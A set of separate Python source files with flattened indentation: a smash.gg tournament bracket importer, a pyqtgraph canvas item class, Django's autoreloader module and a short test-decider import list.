# Parse sub_brackets of parent tournaments.
# If the master tournament only has one sub bracket, it will find it in parse_smashgg_info and call this function
def parse_sub_bracket_info(sub_bracket_info, tournament_info):
sub_bracket_url = sub_bracket_info.url
# hack for tournaments with incomplete pools
#if sub_bracket_info.name!='1':
# return
# in smashgg brackets, sub_bracket for Final Bracket is named '1'
print "---NAME--", sub_bracket_info.name
if sub_bracket_info.name=='1':
sub_tournament_name = ''
else:
sub_tournament_name = ' | ' + sub_bracket_info.name
full_bracket_name = tournament_info.name + sub_tournament_name
print "\n---SUB BRACKET---:", full_bracket_name
sub_bracket = requests.get(sub_bracket_url)
sub_bracket_json = sub_bracket.json()
# pprint(sub_bracket_json)
# Make call to import_tournament_info using parent tournament info (tournament_info)
# Change values for # entrants, url, name
sub_tournament_info = TournamentInfo(sub_bracket_info.id, full_bracket_name, tournament_info.region, tournament_info.date)
sub_tournament_info.url = sub_bracket_url
if sub_bracket_info.name=='1':
sub_tournament_info.public_url = tournament_info.public_url
else:
sub_tournament_info.public_url = tournament_info.public_url + '/' + str(sub_bracket_info.id)
# Inherited form parent tournament header
sub_tournament_info.entrants = tournament_info.entrants
sub_tournament_info.date = tournament_info.date
sub_tournament_info.parent = tournament_info.name
sub_tournament_info.game_type = tournament_info.game_type
print sub_tournament_info
sub_tournament = import_sub_tournament_info(sub_tournament_info)
entrant_list = parse_bracket_entrants(sub_bracket_json, sub_tournament)
parse_bracket_sets(sub_bracket_json, entrant_list, sub_tournament)
def parse_bracket_entrants(sub_bracket_json, sub_tournament):
condensed_entrants = sub_bracket_json['entities']['seeds']
# pprint(condensed_entrants)
entrant_list = []
for entrant in condensed_entrants:
# pprint(entrant)
entrant_id = str(entrant.get("entrantId"))
participant_id = str(entrant['mutations']['entrants'][entrant_id]['participantIds'][0])
player_id = str(entrant['mutations']['entrants'][entrant_id]['playerIds'][participant_id])
print entrant_id, participant_id, player_id
entrant_name = entrant['mutations']['entrants'][entrant_id].get("name")
entrant_info = EntrantInfo(int(entrant_id), entrant_name)
# entrant['mutations']['players'][entrant_id] returns list containing one dictionary
entrant_info.player_tag = entrant['mutations']['players'][player_id].get("gamerTag")
entrant_info.player_prefix = entrant['mutations']['players'][player_id].get("prefix")
entrant_info.player_id = entrant['mutations']['players'][player_id].get("id")
entrant_info.player_region = entrant['mutations']['players'][player_id].get("region")
entrant_info.player_country = entrant['mutations']['players'][player_id].get("country")
entrant_info.player_state = entrant['mutations']['players'][player_id].get("state")
entrant_info.player_sub_seed = entrant.get("groupSeedNum")
entrant_info.player_super_seed = entrant.get("seedNum")
entrant_info.player_sub_placing = entrant.get("placement")
entrant_info.player_super_placing = entrant.get("placement")
entrant_list.append(entrant_info)
print "\n---ENTRANTS---"
for entrant in entrant_list:
print_ignore(entrant)
import_tournament_entrants(entrant_list, sub_tournament)
return entrant_list
# Given JSON of the sub_bracket and list of entrants, isolate sets and record each one individually
def parse_bracket_sets(sub_bracket_json, entrant_list, sub_tournament):
sets = sub_bracket_json['entities']['sets']
# pprint(sets)
set_list = []
for set in sets:
set_id = set.get("id")
set_info = SetInfo(set_id)
set_info.round_number = set.get("round")
set_info.round_text = set.get("midRoundText")
set_info.best_of = set.get("bestOf")
entrant1Score = set.get("entrant1Score")
entrant2Score = set.get("entrant2Score")
if (entrant1Score is None and entrant2Score is None) or (entrant1Score<0 or entrant2Score<0):
continue
if set.get("entrant1Id")==set.get("winnerId"):
set_info.winner_id = set.get("entrant1Id")
set_info.loser_id = set.get("entrant2Id")
set_info.winner_score = entrant1Score
set_info.loser_score = entrant2Score
else:
set_info.winner_id = set.get("entrant2Id")
set_info.loser_id = set.get("entrant1Id")
set_info.winner_score = entrant2Score
set_info.loser_score = entrant1Score
set_info.total_matches = set_info.winner_score + set_info.loser_score
# Algorithm can be more efficient
set_info.winner_tag = next((entrant.entrant_name for entrant in entrant_list if set_info.winner_id==entrant.entrant_id), None)
set_info.loser_tag = next((entrant.entrant_name for entrant in entrant_list if set_info.loser_id==entrant.entrant_id), None)
set_list.append(set_info)
# reassign to entrants in import sets
# set.get('wOverallPlacement')
# set.get('wPlacement')
import_tournament_sets(set_list, sub_tournament)
# Given processed tournament_info object parse_tournament_info, add TournamentHeader object to database
def import_tournament_info(tournament_info):
tournament_game_type = "Super Smash Bros. Melee"
# if date located in Challonge bracket, use this date, otherwise use date passed in as parameter
if tournament_info.date is not None:
tournament_date = tournament_info.date
else:
tournament_date = datetime.date(2099, 01, 01)
new_tournament_header = TournamentHeader(official_title=tournament_info.title,
host=tournament_info.host,
public_url=tournament_info.public_url,
url=tournament_info.url,
name=tournament_info.name,
game_type=tournament_game_type,
date=tournament_date
)
db.session.add(new_tournament_header)
# add tournament_region; if None, then it adds None
found_region = Region.query.filter(Region.region==tournament_info.region).first()
new_tournament_header.region = found_region
db.session.commit()
return new_tournament_header
def import_sub_tournament_info(sub_tournament_info):
new_sub_tournament = Tournament(official_title=sub_tournament_info.title,
url=sub_tournament_info.url,
public_url=sub_tournament_info.public_url,
entrants=sub_tournament_info.entrants,
date=sub_tournament_info.date,
name=sub_tournament_info.name,
game_type=sub_tournament_info.game_type
)
db.session.add(new_sub_tournament)
# associate with TournamentHeader
tournament_header = TournamentHeader.query.filter(TournamentHeader.name==sub_tournament_info.parent).first()
tournament_header.sub_tournaments.append(new_sub_tournament)
new_sub_tournament.region = new_sub_tournament.header.region
db.session.commit()
print "\n---SUBTOURNAMENT---", new_sub_tournament
return new_sub_tournament
# Import smashgg entrants and create User objects in database
def import_tournament_entrants(entrant_list, tournament_obj):
for entrant in entrant_list:
player_tag = entrant.player_tag
checked_player = check_set_user(player_tag, tournament_obj.region)
tournament_obj.placements.append(Placement(
tournament_id=tournament_obj.id,
tournament_name=tournament_obj.name,
user_id=checked_player.id,
placement=int(entrant.player_sub_placing)
))
tournament_obj.entrants = len(entrant_list)
db.session.commit()
return tournament_obj
# Import smashgg sets, associate them with Tournament and create Set objects in database
def import_tournament_sets(set_list, sub_tournament):
print '\n---SETS---'
for set in set_list:
print_ignore(set)
winner_score = set.winner_score
loser_score = set.loser_score
total_matches = set.total_matches
# After calling this function, Users by 'tag' will exist in database in any case.
# stores User object in respective variables
set_winner_tag = set.winner_tag.strip()
winner_user = check_set_user(set_winner_tag, sub_tournament.region)
set_loser_tag = set.loser_tag.strip()
loser_user = check_set_user(set_loser_tag, sub_tournament.region)
round_number = set.round_number
# Query for associated Tournament
if sub_tournament.name is not None:
assocs_tournament = Tournament.query.filter(Tournament.name==sub_tournament.name).first()
else:
print "Tournament not Found"
new_set = Set(tournament_id=assocs_tournament.id,
tournament_name=assocs_tournament.name,
round_type=round_number,
winner_tag=winner_user.tag,
loser_tag=loser_user.tag,
winner_id=winner_user.id,
loser_id=loser_user.id,
winner_score=winner_score,
loser_score=loser_score,
total_matches=total_matches)
db.session.add(new_set)
print_ignore(set)
# update User trueskill ratings based on Set winner and loser
update_rating(winner_user, loser_user)
db.session.commit()
# Master function
def parse_bracket_info(tournament_url, tournament_name, tournament_region, tournament_date):
print "\n---PROCESSING---: ", tournament_name
if tournament_url is None:
return None
else:
# Splice master tournament_id number from the URL (first number after 'brackets/')
id_start = tournament_url.find("brackets/") + 9
id_end = tournament_url.find("/", id_start)
tournament_id = tournament_url[id_start:id_end]
api_url = "https://api.smash.gg/event/" + tournament_id + "?expand[0]=groups&expand[1]=phase"
master = requests.get(api_url)
master_json = master.json()
# pprint(master_json)
# Process and import tournament info, creating new Tournament object
tournament_info = parse_tournament_info(tournament_id, tournament_url, tournament_name, tournament_region, tournament_date)
tournament_obj = import_tournament_info(tournament_info)
# At this point, master is the JSON showing all the sub_bracket/pool tournaments that are contained within this tournament
# Subgroup begin at "displayIdentifier", and you want the IDs of each individual sub_bracket.
# Create list of dictionaries of each sub_bracket with relevant ID info. Only really need "id", to get sub_bracket url
sub_brackets = master_json['entities']['groups']
bracket_list = []
for sub_bracket in sub_brackets:
sub_bracket_info = SubBracket(sub_bracket.get("id"))
sub_bracket_info.phase_id = sub_bracket.get("phaseId")
sub_bracket_info.wave_id = sub_bracket.get("waveId")
sub_bracket_info.name = sub_bracket.get("displayIdentifier")
sub_bracket_info.url = "https://api.smash.gg/phase_group/" + str(sub_bracket_info.id) + "?expand%5B%5D=sets&expand%5B%5D=seeds&expand%5B%5D=entrants"
bracket_list.append(sub_bracket_info)
print "***SUBBRACKET INFO***", sub_bracket_info
for sub_bracket_info in bracket_list:
parse_sub_bracket_info(sub_bracket_info, tournament_info)
# Calculate and assign entrants for tournamentHeader
tournament_header = TournamentHeader.query.filter(TournamentHeader.name==tournament_name).first()
tournament_header.get_final_entrants()
print "---FINISHED---"
return tournament_header
|
|
# -*- coding: utf-8 -*-
import numpy as np
from ..Qt import QtGui, QtCore, QtSvg, QT_LIB
from ..graphicsItems.ROI import ROI
from .. import SRTTransform, ItemGroup
if QT_LIB == 'PySide':
from . import TransformGuiTemplate_pyside as TransformGuiTemplate
elif QT_LIB == 'PyQt4':
from . import TransformGuiTemplate_pyqt as TransformGuiTemplate
elif QT_LIB == 'PyQt5':
from . import TransformGuiTemplate_pyqt5 as TransformGuiTemplate
from .. import debug
class SelectBox(ROI):
def __init__(self, scalable=False, rotatable=True):
#QtGui.QGraphicsRectItem.__init__(self, 0, 0, size[0], size[1])
ROI.__init__(self, [0,0], [1,1], invertible=True)
center = [0.5, 0.5]
if scalable:
self.addScaleHandle([1, 1], center, lockAspect=True)
self.addScaleHandle([0, 0], center, lockAspect=True)
if rotatable:
self.addRotateHandle([0, 1], center)
self.addRotateHandle([1, 0], center)
class CanvasItem(QtCore.QObject):
sigResetUserTransform = QtCore.Signal(object)
sigTransformChangeFinished = QtCore.Signal(object)
sigTransformChanged = QtCore.Signal(object)
"""CanvasItem takes care of managing an item's state--alpha, visibility, z-value, transformations, etc. and
provides a control widget"""
sigVisibilityChanged = QtCore.Signal(object)
transformCopyBuffer = None
def __init__(self, item, **opts):
defOpts = {'name': None, 'z': None, 'movable': True, 'scalable': False, 'rotatable': True, 'visible': True, 'parent':None} #'pos': [0,0], 'scale': [1,1], 'angle':0,
defOpts.update(opts)
self.opts = defOpts
self.selectedAlone = False ## whether this item is the only one selected
QtCore.QObject.__init__(self)
self.canvas = None
self._graphicsItem = item
parent = self.opts['parent']
if parent is not None:
self._graphicsItem.setParentItem(parent.graphicsItem())
self._parentItem = parent
else:
self._parentItem = None
z = self.opts['z']
if z is not None:
item.setZValue(z)
self.ctrl = QtGui.QWidget()
self.layout = QtGui.QGridLayout()
self.layout.setSpacing(0)
self.layout.setContentsMargins(0,0,0,0)
self.ctrl.setLayout(self.layout)
self.alphaLabel = QtGui.QLabel("Alpha")
self.alphaSlider = QtGui.QSlider()
self.alphaSlider.setMaximum(1023)
self.alphaSlider.setOrientation(QtCore.Qt.Horizontal)
self.alphaSlider.setValue(1023)
self.layout.addWidget(self.alphaLabel, 0, 0)
self.layout.addWidget(self.alphaSlider, 0, 1)
self.resetTransformBtn = QtGui.QPushButton('Reset Transform')
self.copyBtn = QtGui.QPushButton('Copy')
self.pasteBtn = QtGui.QPushButton('Paste')
self.transformWidget = QtGui.QWidget()
self.transformGui = TransformGuiTemplate.Ui_Form()
self.transformGui.setupUi(self.transformWidget)
self.layout.addWidget(self.transformWidget, 3, 0, 1, 2)
self.transformGui.mirrorImageBtn.clicked.connect(self.mirrorY)
self.transformGui.reflectImageBtn.clicked.connect(self.mirrorXY)
self.layout.addWidget(self.resetTransformBtn, 1, 0, 1, 2)
self.layout.addWidget(self.copyBtn, 2, 0, 1, 1)
self.layout.addWidget(self.pasteBtn, 2, 1, 1, 1)
self.alphaSlider.valueChanged.connect(self.alphaChanged)
self.alphaSlider.sliderPressed.connect(self.alphaPressed)
self.alphaSlider.sliderReleased.connect(self.alphaReleased)
self.resetTransformBtn.clicked.connect(self.resetTransformClicked)
self.copyBtn.clicked.connect(self.copyClicked)
self.pasteBtn.clicked.connect(self.pasteClicked)
self.setMovable(self.opts['movable']) ## update gui to reflect this option
if 'transform' in self.opts:
self.baseTransform = self.opts['transform']
else:
self.baseTransform = SRTTransform()
if 'pos' in self.opts and self.opts['pos'] is not None:
self.baseTransform.translate(self.opts['pos'])
if 'angle' in self.opts and self.opts['angle'] is not None:
self.baseTransform.rotate(self.opts['angle'])
if 'scale' in self.opts and self.opts['scale'] is not None:
self.baseTransform.scale(self.opts['scale'])
## create selection box (only visible when selected)
tr = self.baseTransform.saveState()
if 'scalable' not in opts and tr['scale'] == (1,1):
self.opts['scalable'] = True
## every CanvasItem implements its own individual selection box
## so that subclasses are free to make their own.
self.selectBox = SelectBox(scalable=self.opts['scalable'], rotatable=self.opts['rotatable'])
self.selectBox.hide()
self.selectBox.setZValue(1e6)
self.selectBox.sigRegionChanged.connect(self.selectBoxChanged) ## calls selectBoxMoved
self.selectBox.sigRegionChangeFinished.connect(self.selectBoxChangeFinished)
## set up the transformations that will be applied to the item
## (It is not safe to use item.setTransform, since the item might count on that not changing)
self.itemRotation = QtGui.QGraphicsRotation()
self.itemScale = QtGui.QGraphicsScale()
self._graphicsItem.setTransformations([self.itemRotation, self.itemScale])
self.tempTransform = SRTTransform() ## holds the additional transform that happens during a move - gets added to the userTransform when move is done.
self.userTransform = SRTTransform() ## stores the total transform of the object
self.resetUserTransform()
def setMovable(self, m):
self.opts['movable'] = m
if m:
self.resetTransformBtn.show()
self.copyBtn.show()
self.pasteBtn.show()
else:
self.resetTransformBtn.hide()
self.copyBtn.hide()
self.pasteBtn.hide()
def setCanvas(self, canvas):
## Called by canvas whenever the item is added.
## It is our responsibility to add all graphicsItems to the canvas's scene
## The canvas will automatically add our graphicsitem,
## so we just need to take care of the selectbox.
if canvas is self.canvas:
return
if canvas is None:
self.canvas.removeFromScene(self._graphicsItem)
self.canvas.removeFromScene(self.selectBox)
else:
canvas.addToScene(self._graphicsItem)
canvas.addToScene(self.selectBox)
self.canvas = canvas
def graphicsItem(self):
"""Return the graphicsItem for this canvasItem."""
return self._graphicsItem
def parentItem(self):
return self._parentItem
def setParentItem(self, parent):
self._parentItem = parent
if parent is not None:
if isinstance(parent, CanvasItem):
parent = parent.graphicsItem()
self.graphicsItem().setParentItem(parent)
#def name(self):
#return self.opts['name']
def copyClicked(self):
CanvasItem.transformCopyBuffer = self.saveTransform()
def pasteClicked(self):
t = CanvasItem.transformCopyBuffer
if t is None:
return
else:
self.restoreTransform(t)
def mirrorY(self):
if not self.isMovable():
return
#flip = self.transformGui.mirrorImageCheck.isChecked()
#tr = self.userTransform.saveState()
inv = SRTTransform()
inv.scale(-1, 1)
self.userTransform = self.userTransform * inv
self.updateTransform()
self.selectBoxFromUser()
self.sigTransformChangeFinished.emit(self)
#if flip:
#if tr['scale'][0] < 0 xor tr['scale'][1] < 0:
#return
#else:
#self.userTransform.setScale([-tr['scale'][0], tr['scale'][1]])
#self.userTransform.setTranslate([-tr['pos'][0], tr['pos'][1]])
#self.userTransform.setRotate(-tr['angle'])
#self.updateTransform()
#self.selectBoxFromUser()
#return
#elif not flip:
#if tr['scale'][0] > 0 and tr['scale'][1] > 0:
#return
#else:
#self.userTransform.setScale([-tr['scale'][0], tr['scale'][1]])
#self.userTransform.setTranslate([-tr['pos'][0], tr['pos'][1]])
#self.userTransform.setRotate(-tr['angle'])
#self.updateTransform()
#self.selectBoxFromUser()
#return
def mirrorXY(self):
if not self.isMovable():
return
self.rotate(180.)
# inv = SRTTransform()
# inv.scale(-1, -1)
# self.userTransform = self.userTransform * inv #flip lr/ud
# s=self.updateTransform()
# self.setTranslate(-2*s['pos'][0], -2*s['pos'][1])
# self.selectBoxFromUser()
def hasUserTransform(self):
#print self.userRotate, self.userTranslate
return not self.userTransform.isIdentity()
def ctrlWidget(self):
return self.ctrl
def alphaChanged(self, val):
alpha = val / 1023.
self._graphicsItem.setOpacity(alpha)
def setAlpha(self, alpha):
self.alphaSlider.setValue(int(np.clip(alpha * 1023, 0, 1023)))
def alpha(self):
return self.alphaSlider.value() / 1023.
def isMovable(self):
return self.opts['movable']
def selectBoxMoved(self):
"""The selection box has moved; get its transformation information and pass to the graphics item"""
self.userTransform = self.selectBox.getGlobalTransform(relativeTo=self.selectBoxBase)
self.updateTransform()
def scale(self, x, y):
self.userTransform.scale(x, y)
self.selectBoxFromUser()
self.updateTransform()
def rotate(self, ang):
self.userTransform.rotate(ang)
self.selectBoxFromUser()
self.updateTransform()
def translate(self, x, y):
self.userTransform.translate(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setTranslate(self, x, y):
self.userTransform.setTranslate(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setRotate(self, angle):
self.userTransform.setRotate(angle)
self.selectBoxFromUser()
self.updateTransform()
def setScale(self, x, y):
self.userTransform.setScale(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setTemporaryTransform(self, transform):
self.tempTransform = transform
self.updateTransform()
def applyTemporaryTransform(self):
"""Collapses tempTransform into UserTransform, resets tempTransform"""
self.userTransform = self.userTransform * self.tempTransform ## order is important!
self.resetTemporaryTransform()
self.selectBoxFromUser() ## update the selection box to match the new userTransform
def resetTemporaryTransform(self):
self.tempTransform = SRTTransform() ## don't use Transform.reset()--this transform might be used elsewhere.
self.updateTransform()
def transform(self):
return self._graphicsItem.transform()
def updateTransform(self):
"""Regenerate the item position from the base, user, and temp transforms"""
transform = self.baseTransform * self.userTransform * self.tempTransform ## order is important
s = transform.saveState()
self._graphicsItem.setPos(*s['pos'])
self.itemRotation.setAngle(s['angle'])
self.itemScale.setXScale(s['scale'][0])
self.itemScale.setYScale(s['scale'][1])
self.displayTransform(transform)
return(s) # return the transform state
def displayTransform(self, transform):
"""Updates transform numbers in the ctrl widget."""
tr = transform.saveState()
self.transformGui.translateLabel.setText("Translate: (%f, %f)" %(tr['pos'][0], tr['pos'][1]))
self.transformGui.rotateLabel.setText("Rotate: %f degrees" %tr['angle'])
self.transformGui.scaleLabel.setText("Scale: (%f, %f)" %(tr['scale'][0], tr['scale'][1]))
def resetUserTransform(self):
self.userTransform.reset()
self.updateTransform()
self.selectBox.blockSignals(True)
self.selectBoxToItem()
self.selectBox.blockSignals(False)
self.sigTransformChanged.emit(self)
self.sigTransformChangeFinished.emit(self)
def resetTransformClicked(self):
self.resetUserTransform()
self.sigResetUserTransform.emit(self)
def restoreTransform(self, tr):
try:
self.userTransform = SRTTransform(tr)
self.updateTransform()
self.selectBoxFromUser() ## move select box to match
self.sigTransformChanged.emit(self)
self.sigTransformChangeFinished.emit(self)
except:
self.userTransform = SRTTransform()
debug.printExc("Failed to load transform:")
def saveTransform(self):
"""Return a dict containing the current user transform"""
return self.userTransform.saveState()
def selectBoxFromUser(self):
"""Move the selection box to match the current userTransform"""
## user transform
#trans = QtGui.QTransform()
#trans.translate(*self.userTranslate)
#trans.rotate(-self.userRotate)
#x2, y2 = trans.map(*self.selectBoxBase['pos'])
self.selectBox.blockSignals(True)
self.selectBox.setState(self.selectBoxBase)
self.selectBox.applyGlobalTransform(self.userTransform)
#self.selectBox.setAngle(self.userRotate)
#self.selectBox.setPos([x2, y2])
self.selectBox.blockSignals(False)
def selectBoxToItem(self):
"""Move/scale the selection box so it fits the item's bounding rect. (assumes item is not rotated)"""
self.itemRect = self._graphicsItem.boundingRect()
rect = self._graphicsItem.mapRectToParent(self.itemRect)
self.selectBox.blockSignals(True)
self.selectBox.setPos([rect.x(), rect.y()])
self.selectBox.setSize(rect.size())
self.selectBox.setAngle(0)
self.selectBoxBase = self.selectBox.getState().copy()
self.selectBox.blockSignals(False)
def zValue(self):
return self.opts['z']
def setZValue(self, z):
self.opts['z'] = z
if z is not None:
self._graphicsItem.setZValue(z)
def selectionChanged(self, sel, multi):
"""
Inform the item that its selection state has changed.
============== =========================================================
**Arguments:**
sel (bool) whether the item is currently selected
multi (bool) whether there are multiple items currently
selected
============== =========================================================
"""
self.selectedAlone = sel and not multi
self.showSelectBox()
if self.selectedAlone:
self.ctrlWidget().show()
else:
self.ctrlWidget().hide()
def showSelectBox(self):
"""Display the selection box around this item if it is selected and movable"""
if self.selectedAlone and self.isMovable() and self.isVisible(): #and len(self.canvas.itemList.selectedItems())==1:
self.selectBox.show()
else:
self.selectBox.hide()
def hideSelectBox(self):
self.selectBox.hide()
def selectBoxChanged(self):
self.selectBoxMoved()
self.sigTransformChanged.emit(self)
def selectBoxChangeFinished(self):
self.sigTransformChangeFinished.emit(self)
def alphaPressed(self):
"""Hide selection box while slider is moving"""
self.hideSelectBox()
def alphaReleased(self):
self.showSelectBox()
def show(self):
if self.opts['visible']:
return
self.opts['visible'] = True
self._graphicsItem.show()
self.showSelectBox()
self.sigVisibilityChanged.emit(self)
def hide(self):
if not self.opts['visible']:
return
self.opts['visible'] = False
self._graphicsItem.hide()
self.hideSelectBox()
self.sigVisibilityChanged.emit(self)
def setVisible(self, vis):
if vis:
self.show()
else:
self.hide()
def isVisible(self):
return self.opts['visible']
def saveState(self):
return {
'type': self.__class__.__name__,
'name': self.name,
'visible': self.isVisible(),
'alpha': self.alpha(),
'userTransform': self.saveTransform(),
'z': self.zValue(),
'scalable': self.opts['scalable'],
'rotatable': self.opts['rotatable'],
'movable': self.opts['movable'],
}
def restoreState(self, state):
self.setVisible(state['visible'])
self.setAlpha(state['alpha'])
self.restoreTransform(state['userTransform'])
self.setZValue(state['z'])
class GroupCanvasItem(CanvasItem):
"""
Canvas item used for grouping others
"""
def __init__(self, **opts):
defOpts = {'movable': False, 'scalable': False}
defOpts.update(opts)
item = ItemGroup()
CanvasItem.__init__(self, item, **defOpts)
|
|
# Autoreloading launcher.
# Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org).
# Some taken from Ian Bicking's Paste (http://pythonpaste.org/).
#
# Portions copyright (c) 2004, CherryPy Team ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the CherryPy Team nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import signal
import subprocess
import sys
import time
import traceback
import _thread
from django.apps import apps
from django.conf import settings
from django.core.signals import request_finished
from django.utils import six
# This import does nothing, but it's necessary to avoid some race conditions
# in the threading module. See http://code.djangoproject.com/ticket/2330 .
try:
import threading # NOQA
except ImportError:
pass
try:
import termios
except ImportError:
termios = None
USE_INOTIFY = False
try:
# Test whether inotify is enabled and likely to work
import pyinotify
fd = pyinotify.INotifyWrapper.create().inotify_init()
if fd >= 0:
USE_INOTIFY = True
os.close(fd)
except ImportError:
pass
RUN_RELOADER = True
FILE_MODIFIED = 1
I18N_MODIFIED = 2
_mtimes = {}
_win = (sys.platform == "win32")
_exception = None
_error_files = []
_cached_modules = set()
_cached_filenames = []
def gen_filenames(only_new=False):
"""
Returns a list of filenames referenced in sys.modules and translation
files.
"""
# N.B. ``list(...)`` is needed, because this runs in parallel with
# application code which might be mutating ``sys.modules``, and this will
# fail with RuntimeError: cannot mutate dictionary while iterating
global _cached_modules, _cached_filenames
module_values = set(sys.modules.values())
_cached_filenames = clean_files(_cached_filenames)
if _cached_modules == module_values:
# No changes in module list, short-circuit the function
if only_new:
return []
else:
return _cached_filenames + clean_files(_error_files)
new_modules = module_values - _cached_modules
new_filenames = clean_files(
[filename.__file__ for filename in new_modules
if hasattr(filename, '__file__')])
if not _cached_filenames and settings.USE_I18N:
# Add the names of the .mo files that can be generated
# by compilemessages management command to the list of files watched.
basedirs = [os.path.join(os.path.dirname(os.path.dirname(__file__)),
'conf', 'locale'),
'locale']
for app_config in reversed(list(apps.get_app_configs())):
basedirs.append(os.path.join(app_config.path, 'locale'))
basedirs.extend(settings.LOCALE_PATHS)
basedirs = [os.path.abspath(basedir) for basedir in basedirs
if os.path.isdir(basedir)]
for basedir in basedirs:
for dirpath, dirnames, locale_filenames in os.walk(basedir):
for filename in locale_filenames:
if filename.endswith('.mo'):
new_filenames.append(os.path.join(dirpath, filename))
_cached_modules = _cached_modules.union(new_modules)
_cached_filenames += new_filenames
if only_new:
return new_filenames + clean_files(_error_files)
else:
return _cached_filenames + clean_files(_error_files)
def clean_files(filelist):
filenames = []
for filename in filelist:
if not filename:
continue
if filename.endswith(".pyc") or filename.endswith(".pyo"):
filename = filename[:-1]
if filename.endswith("$py.class"):
filename = filename[:-9] + ".py"
if os.path.exists(filename):
filenames.append(filename)
return filenames
def reset_translations():
import gettext
from django.utils.translation import trans_real
gettext._translations = {}
trans_real._translations = {}
trans_real._default = None
trans_real._active = threading.local()
def inotify_code_changed():
"""
Checks for changed code using inotify. After being called
it blocks until a change event has been fired.
"""
class EventHandler(pyinotify.ProcessEvent):
modified_code = None
def process_default(self, event):
if event.path.endswith('.mo'):
EventHandler.modified_code = I18N_MODIFIED
else:
EventHandler.modified_code = FILE_MODIFIED
wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm, EventHandler())
def update_watch(sender=None, **kwargs):
if sender and getattr(sender, 'handles_files', False):
# No need to update watches when request serves files.
# (sender is supposed to be a django.core.handlers.BaseHandler subclass)
return
mask = (
pyinotify.IN_MODIFY |
pyinotify.IN_DELETE |
pyinotify.IN_ATTRIB |
pyinotify.IN_MOVED_FROM |
pyinotify.IN_MOVED_TO |
pyinotify.IN_CREATE |
pyinotify.IN_DELETE_SELF |
pyinotify.IN_MOVE_SELF
)
for path in gen_filenames(only_new=True):
wm.add_watch(path, mask)
# New modules may get imported when a request is processed.
request_finished.connect(update_watch)
# Block until an event happens.
update_watch()
notifier.check_events(timeout=None)
notifier.read_events()
notifier.process_events()
notifier.stop()
# If we are here the code must have changed.
return EventHandler.modified_code
def code_changed():
global _mtimes, _win
for filename in gen_filenames():
stat = os.stat(filename)
mtime = stat.st_mtime
if _win:
mtime -= stat.st_ctime
if filename not in _mtimes:
_mtimes[filename] = mtime
continue
if mtime != _mtimes[filename]:
_mtimes = {}
try:
del _error_files[_error_files.index(filename)]
except ValueError:
pass
return I18N_MODIFIED if filename.endswith('.mo') else FILE_MODIFIED
return False
def check_errors(fn):
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
six.reraise(*_exception)
def ensure_echo_on():
if termios:
fd = sys.stdin
if fd.isatty():
attr_list = termios.tcgetattr(fd)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(fd, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def reloader_thread():
ensure_echo_on()
if USE_INOTIFY:
fn = inotify_code_changed
else:
fn = code_changed
while RUN_RELOADER:
change = fn()
if change == FILE_MODIFIED:
sys.exit(3) # force reload
elif change == I18N_MODIFIED:
reset_translations()
time.sleep(1)
def restart_with_reloader():
while True:
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions] + sys.argv
new_environ = os.environ.copy()
new_environ["RUN_MAIN"] = 'true'
exit_code = subprocess.call(args, env=new_environ)
if exit_code != 3:
return exit_code
def python_reloader(main_func, args, kwargs):
if os.environ.get("RUN_MAIN") == "true":
_thread.start_new_thread(main_func, args, kwargs)
try:
reloader_thread()
except KeyboardInterrupt:
pass
else:
try:
exit_code = restart_with_reloader()
if exit_code < 0:
os.kill(os.getpid(), -exit_code)
else:
sys.exit(exit_code)
except KeyboardInterrupt:
pass
def jython_reloader(main_func, args, kwargs):
from _systemrestart import SystemRestart
_thread.start_new_thread(main_func, args)
while True:
if code_changed():
raise SystemRestart
time.sleep(1)
def main(main_func, args=None, kwargs=None):
if args is None:
args = ()
if kwargs is None:
kwargs = {}
if sys.platform.startswith('java'):
reloader = jython_reloader
else:
reloader = python_reloader
wrapped_main_func = check_errors(main_func)
reloader(wrapped_main_func, args, kwargs)
|
|
import json
from deciders.test_01 import test_01
from deciders.test_02 import test_02
from deciders.test_03 import test_03
from deciders.test_04 import test_04
from deciders.test_05 import test_05
from deciders.test_06 import test_06
from deciders.test_07 import test_07
from deciders.test_08 import test_08
from deciders.test_09 import test_09
from deciders.test_10 import test_10
from deciders.test_11 import test_11
from deciders.test_12 import test_12
from deciders.test_13 import test_13
